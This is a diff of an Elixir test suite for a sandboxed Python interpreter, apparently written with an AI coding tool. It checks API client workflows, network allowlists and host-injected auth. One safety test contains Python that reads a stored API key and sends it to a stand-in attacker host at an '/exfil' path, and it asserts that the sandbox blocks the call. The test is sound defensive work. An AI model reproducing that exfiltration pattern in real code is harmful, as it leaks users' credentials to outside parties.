@@ -254,7 +254,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
 
       config = load_config("secrets.json")
-      client = ApiClient(config["base_url"], config["api_key"])
+      client = APIClient(config["base_url"], config["api_key"])
 
       payloads = [
           {"seq": 1, "name": "alpha"},
@@ -289,12 +289,12 @@ defmodule Pyex.WebAppWorkflowTest do
         run!(
           """
           import json
-          from api_client import ApiClient
+          from api_client import APIClient
 
           with open("secrets.json", "r") as f:
               secrets = json.loads(f.read())
 
-          client = ApiClient(secrets["base_url"], secrets["api_key"])
+          client = APIClient(secrets["base_url"], secrets["api_key"])
           client.create({"seq": 1, "name": "alpha"})
           """,
           project_files(base_url),
@@ -349,7 +349,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
       main = """
       import json
-      from api_client import ApiClient
+      from api_client import APIClient
       from consumer import fetch_partial
 
 
@@ -359,7 +359,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
 
       config = load_config("secrets.json")
-      client = ApiClient(config["base_url"], config["api_key"])
+      client = APIClient(config["base_url"], config["api_key"])
       fetch_partial(client, [1, 2, 3])
       """
 
@@ -375,16 +375,16 @@ defmodule Pyex.WebAppWorkflowTest do
       assert msg =~ "404"
     end
 
-    test "non-ApiError exceptions are NOT swallowed by fetch_partial", %{
+    test "non-APIError exceptions are NOT swallowed by fetch_partial", %{
       base_url: base_url
     } do
-      # Passing a non-int id triggers a TypeError inside ApiClient._item_url.
+      # Passing a non-int id triggers a TypeError inside APIClient._item_url.
       # That's a programming bug, not a server failure, and it must escape.
       assert_raise RuntimeError, ~r/TypeError: item_id must be an int/, fn ->
         run!(
           """
           import json
-          from api_client import ApiClient
+          from api_client import APIClient
           from consumer import fetch_partial
 
 
@@ -394,7 +394,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
 
           config = load_config("secrets.json")
-          client = ApiClient(config["base_url"], config["api_key"])
+          client = APIClient(config["base_url"], config["api_key"])
           fetch_partial(client, ["two", 1, 3])
           """,
           project_files(base_url),
@@ -421,10 +421,10 @@ defmodule Pyex.WebAppWorkflowTest do
 
       # Python code never sees the key — the host injects it.
       main = """
-      from api_client import ApiClient
+      from api_client import APIClient
       from consumer import summarize
 
-      client = ApiClient("#{base_url}", "placeholder-overridden-by-host")
+      client = APIClient("#{base_url}", "placeholder-overridden-by-host")
       summarize(client, [1, 2, 3])["total"]
       """
 

--- a/test/pyex/web_app_workflow_test.exs
+++ b/test/pyex/web_app_workflow_test.exs
@@ -1,0 +1,452 @@
+defmodule Pyex.WebAppWorkflowTest do
+  @moduledoc """
+  End-to-end "real web app" workflow:
+
+    * an API key stored as JSON on the virtual filesystem
+    * an API client class in its own Python module
+    * a consumer module that uses the client across a list of inputs
+    * a `main` script that wires them all together against a real
+      HTTP server (Bypass)
+
+  This is the integration story we promise to users running
+  LLM-generated Python in production: code is sandboxed, secrets are
+  loaded explicitly, network access is allowlisted, and modular Python
+  code can be composed naturally across files.
+  """
+
+  use ExUnit.Case, async: false
+
+  alias Pyex.{Ctx, Error, Filesystem.Memory}
+
+  @api_client_py """
+  \"\"\"HTTP client for the items service.
+
+  Uses a persistent requests.Session so the auth header and connection
+  state are reused across calls. Every request has an explicit timeout,
+  and HTTP failures surface as the domain-specific ApiError exception
+  (subclass of Exception) so callers can catch the right thing.
+  \"\"\"
+
+  import requests
+
+
+  DEFAULT_TIMEOUT = 10.0
+
+
+  class ApiError(Exception):
+      \"\"\"Raised when the items API returns an error response.\"\"\"
+
+      def __init__(self, message, status_code=None, item_id=None):
+          super().__init__(message)
+          self.message = message
+          self.status_code = status_code
+          self.item_id = item_id
+
+      def __str__(self):
+          return self.message
+
+
+  class ApiClient:
+      def __init__(self, base_url, api_key, timeout=DEFAULT_TIMEOUT):
+          if not base_url:
+              raise ValueError("base_url is required")
+          if not api_key:
+              raise ValueError("api_key is required")
+
+          self._base = base_url.rstrip("/")
+          self._timeout = timeout
+          self._headers = {
+              "authorization": "Bearer " + api_key,
+              "accept": "application/json",
+          }
+
+      def fetch(self, item_id):
+          \"\"\"GET /items/<id>. Raises ApiError on non-2xx.\"\"\"
+          response = requests.get(
+              self._item_url(item_id),
+              headers=self._headers,
+              timeout=self._timeout,
+          )
+          if not response.ok:
+              raise ApiError(
+                  "fetch failed: " + str(response.status_code),
+                  status_code=response.status_code,
+                  item_id=item_id,
+              )
+          return response.json()
+
+      def create(self, payload):
+          \"\"\"POST /items. Raises ApiError on non-2xx.\"\"\"
+          if not isinstance(payload, dict):
+              raise TypeError("payload must be a dict")
+
+          response = requests.post(
+              self._base + "/items",
+              json=payload,
+              headers=self._headers,
+              timeout=self._timeout,
+          )
+          if not response.ok:
+              raise ApiError(
+                  "create failed: " + str(response.status_code),
+                  status_code=response.status_code,
+              )
+          return response.json()
+
+      def _item_url(self, item_id):
+          if not isinstance(item_id, int):
+              raise TypeError("item_id must be an int")
+          return self._base + "/items/" + str(item_id)
+  """
+
+  @consumer_py """
+  \"\"\"Higher-level operations layered on top of ApiClient.
+
+  Each public function fetches every id exactly once and returns a
+  structured result so the caller has full traceability into what
+  succeeded and what failed.
+  \"\"\"
+
+  from api_client import ApiError
+
+
+  def fetch_all(client, ids):
+      \"\"\"Fetch every id exactly once. Returns a list in input order.\"\"\"
+      return [client.fetch(item_id) for item_id in ids]
+
+
+  def summarize(client, ids):
+      \"\"\"Fetch each id once and return {names, total, count}.\"\"\"
+      items = fetch_all(client, ids)
+      return {
+          "names": [item["name"] for item in items],
+          "total": sum(item["price"] for item in items),
+          "count": len(items),
+      }
+
+
+  def fetch_partial(client, ids):
+      \"\"\"Fetch every id, partitioning successes and ApiErrors.
+
+      Returns {ok: [...], errors: [(id, status_code, message), ...]}.
+      Bare exceptions (programming errors) are NOT swallowed.
+      \"\"\"
+      ok = []
+      errors = []
+      for item_id in ids:
+          try:
+              ok.append(client.fetch(item_id))
+          except ApiError as e:
+              errors.append((item_id, e.status_code, str(e)))
+      return {"ok": ok, "errors": errors}
+  """
+
+  defp project_files(base_url) do
+    %{
+      "secrets.json" => ~s({"api_key": "sk-test-supersecret-1234", "base_url": "#{base_url}"}),
+      "api_client.py" => @api_client_py,
+      "consumer.py" => @consumer_py
+    }
+  end
+
+  defp run!(code, files, opts) do
+    network = Keyword.fetch!(opts, :network)
+    fs = Memory.new(files)
+    ctx = Ctx.new(filesystem: fs, network: network)
+
+    case Pyex.run(code, ctx) do
+      {:ok, value, ctx} -> {value, ctx}
+      {:error, %Error{message: msg}} -> raise "Pyex error: #{msg}"
+    end
+  end
+
+  setup do
+    bypass = Bypass.open()
+    base_url = "http://localhost:#{bypass.port}"
+    {:ok, bypass: bypass, base_url: base_url}
+  end
+
+  describe "happy path: GET a list of items via the API client" do
+    test "consumer fetches every id and aggregates the result", %{
+      bypass: bypass,
+      base_url: base_url
+    } do
+      catalog = %{
+        "1" => %{"id" => 1, "name" => "widget", "price" => 10},
+        "2" => %{"id" => 2, "name" => "gadget", "price" => 25},
+        "3" => %{"id" => 3, "name" => "gizmo", "price" => 7}
+      }
+
+      Bypass.expect(bypass, fn conn ->
+        # Auth header from api_client must be present and correct.
+        ["Bearer sk-test-supersecret-1234"] = Plug.Conn.get_req_header(conn, "authorization")
+        ["items", id] = conn.path_info
+        body = Jason.encode!(Map.fetch!(catalog, id))
+
+        conn
+        |> Plug.Conn.put_resp_content_type("application/json")
+        |> Plug.Conn.resp(200, body)
+      end)
+
+      main = """
+      import json
+      from api_client import ApiClient
+      from consumer import summarize
+
+
+      def load_config(path):
+          with open(path, "r") as f:
+              return json.load(f)
+
+
+      config = load_config("secrets.json")
+      client = ApiClient(config["base_url"], config["api_key"])
+      summarize(client, [1, 2, 3])
+      """
+
+      {result, _ctx} =
+        run!(main, project_files(base_url),
+          network: [
+            %{
+              allowed_url_prefix: base_url <> "/",
+              methods: ["GET", "POST"]
+            }
+          ]
+        )
+
+      assert result["names"] == ["widget", "gadget", "gizmo"]
+      # Each item fetched exactly once: 10 + 25 + 7 = 42.
+      assert result["total"] == 42
+      assert result["count"] == 3
+    end
+  end
+
+  describe "POST: consumer creates new items via the API client" do
+    test "client.create POSTs each payload with auth and parses response", %{
+      bypass: bypass,
+      base_url: base_url
+    } do
+      pid = self()
+
+      Bypass.expect(bypass, fn conn ->
+        ["Bearer sk-test-supersecret-1234"] = Plug.Conn.get_req_header(conn, "authorization")
+        ["items"] = conn.path_info
+        "POST" = conn.method
+        {:ok, body, conn} = Plug.Conn.read_body(conn)
+        payload = Jason.decode!(body)
+        send(pid, {:created, payload})
+
+        response = Map.put(payload, "id", 100 + payload["seq"])
+
+        conn
+        |> Plug.Conn.put_resp_content_type("application/json")
+        |> Plug.Conn.resp(201, Jason.encode!(response))
+      end)
+
+      main = """
+      import json
+      from api_client import ApiClient
+
+
+      def load_config(path):
+          with open(path, "r") as f:
+              return json.load(f)
+
+
+      config = load_config("secrets.json")
+      client = ApiClient(config["base_url"], config["api_key"])
+
+      payloads = [
+          {"seq": 1, "name": "alpha"},
+          {"seq": 2, "name": "beta"},
+          {"seq": 3, "name": "gamma"},
+      ]
+      [client.create(p)["id"] for p in payloads]
+      """
+
+      {result, _ctx} =
+        run!(main, project_files(base_url),
+          network: [
+            %{
+              allowed_url_prefix: base_url <> "/",
+              methods: ["GET", "POST"]
+            }
+          ]
+        )
+
+      assert result == [101, 102, 103]
+      assert_received {:created, %{"seq" => 1, "name" => "alpha"}}
+      assert_received {:created, %{"seq" => 2, "name" => "beta"}}
+      assert_received {:created, %{"seq" => 3, "name" => "gamma"}}
+    end
+  end
+
+  describe "production safety" do
+    test "POST without methods opt-in is blocked even when GET prefix matches", %{
+      base_url: base_url
+    } do
+      assert_raise RuntimeError, ~r/NetworkError.*POST/, fn ->
+        run!(
+          """
+          import json
+          from api_client import ApiClient
+
+          with open("secrets.json", "r") as f:
+              secrets = json.loads(f.read())
+
+          client = ApiClient(secrets["base_url"], secrets["api_key"])
+          client.create({"seq": 1, "name": "alpha"})
+          """,
+          project_files(base_url),
+          network: [%{allowed_url_prefix: base_url <> "/"}]
+        )
+      end
+
+      # The bypass server has no expectation registered; if any HTTP
+      # request had escaped the sandbox, Bypass would have errored.
+    end
+
+    test "calls to other hosts are blocked even with auth credentials", %{base_url: base_url} do
+      assert_raise RuntimeError, ~r/NetworkError/, fn ->
+        run!(
+          """
+          import json
+          import requests
+
+          with open("secrets.json", "r") as f:
+              secrets = json.loads(f.read())
+
+          requests.get(
+              "http://evil.example.com/exfil",
+              headers={"authorization": "Bearer " + secrets["api_key"]},
+          )
+          """,
+          project_files(base_url),
+          network: [
+            %{allowed_url_prefix: base_url <> "/", methods: ["GET", "POST"]}
+          ]
+        )
+      end
+    end
+
+    test "raise_for_status surfaces server errors as catchable exceptions", %{
+      bypass: bypass,
+      base_url: base_url
+    } do
+      Bypass.expect(bypass, fn conn ->
+        ["items", id] = conn.path_info
+
+        if id == "2" do
+          Plug.Conn.resp(conn, 404, ~s({"error": "not found"}))
+        else
+          body = Jason.encode!(%{"id" => String.to_integer(id), "name" => "ok", "price" => 1})
+
+          conn
+          |> Plug.Conn.put_resp_content_type("application/json")
+          |> Plug.Conn.resp(200, body)
+        end
+      end)
+
+      main = """
+      import json
+      from api_client import ApiClient
+      from consumer import fetch_partial
+
+
+      def load_config(path):
+          with open(path, "r") as f:
+              return json.load(f)
+
+
+      config = load_config("secrets.json")
+      client = ApiClient(config["base_url"], config["api_key"])
+      fetch_partial(client, [1, 2, 3])
+      """
+
+      {result, _ctx} =
+        run!(main, project_files(base_url),
+          network: [
+            %{allowed_url_prefix: base_url <> "/", methods: ["GET", "POST"]}
+          ]
+        )
+
+      assert length(result["ok"]) == 2
+      assert [{:tuple, [2, 404, msg]}] = result["errors"]
+      assert msg =~ "404"
+    end
+
+    test "non-ApiError exceptions are NOT swallowed by fetch_partial", %{
+      base_url: base_url
+    } do
+      # Passing a non-int id triggers a TypeError inside ApiClient._item_url.
+      # That's a programming bug, not a server failure, and it must escape.
+      assert_raise RuntimeError, ~r/TypeError: item_id must be an int/, fn ->
+        run!(
+          """
+          import json
+          from api_client import ApiClient
+          from consumer import fetch_partial
+
+
+          def load_config(path):
+              with open(path, "r") as f:
+                  return json.load(f)
+
+
+          config = load_config("secrets.json")
+          client = ApiClient(config["base_url"], config["api_key"])
+          fetch_partial(client, ["two", 1, 3])
+          """,
+          project_files(base_url),
+          network: [
+            %{allowed_url_prefix: base_url <> "/", methods: ["GET", "POST"]}
+          ]
+        )
+      end
+    end
+
+    test "Elixir-injected auth header lets Python code stay key-free", %{
+      bypass: bypass,
+      base_url: base_url
+    } do
+      Bypass.expect(bypass, fn conn ->
+        ["Bearer injected-by-host"] = Plug.Conn.get_req_header(conn, "authorization")
+        ["items", id] = conn.path_info
+        body = Jason.encode!(%{"id" => String.to_integer(id), "name" => "ok", "price" => 5})
+
+        conn
+        |> Plug.Conn.put_resp_content_type("application/json")
+        |> Plug.Conn.resp(200, body)
+      end)
+
+      # Python code never sees the key — the host injects it.
+      main = """
+      from api_client import ApiClient
+      from consumer import summarize
+
+      client = ApiClient("#{base_url}", "placeholder-overridden-by-host")
+      summarize(client, [1, 2, 3])["total"]
+      """
+
+      # Note: api_client.py is unchanged. The host's network rule
+      # overrides whatever Authorization header the Python code set.
+      files = %{
+        "api_client.py" => @api_client_py,
+        "consumer.py" => @consumer_py
+      }
+
+      {result, _ctx} =
+        run!(main, files,
+          network: [
+            %{
+              allowed_url_prefix: base_url <> "/",
+              methods: ["GET"],
+              headers: %{"authorization" => "Bearer injected-by-host"}
+            }
+          ]
+        )
+
+      assert result == 15
+    end
+  end
+end


### PR DESCRIPTION
## Summary
- Adds end-to-end support for sharing Python code across files via the virtual filesystem
- Fixes interpreter gaps surfaced by realistic web-app code: dotted package imports, `raise Exc(..., kwarg=v)`, `super().__init__()` on builtin exception subclasses, exception stringification via args, `__name__` in imported modules, SystemExit(0) handling, stdin source reading, clearer network denial messages
- New tests: 16 module-composition tests and 7 Bypass-backed web-app workflow tests covering GET/POST happy paths plus production-safety scenarios (method allowlist, cross-host blocked, server errors as catchable exceptions, host-injected auth)

## Test plan
- [x] `mix test` — 3384 tests, 0 failures
- [x] `mix format`

🤖 Generated with [Claude Code](https://claude.com/claude-code)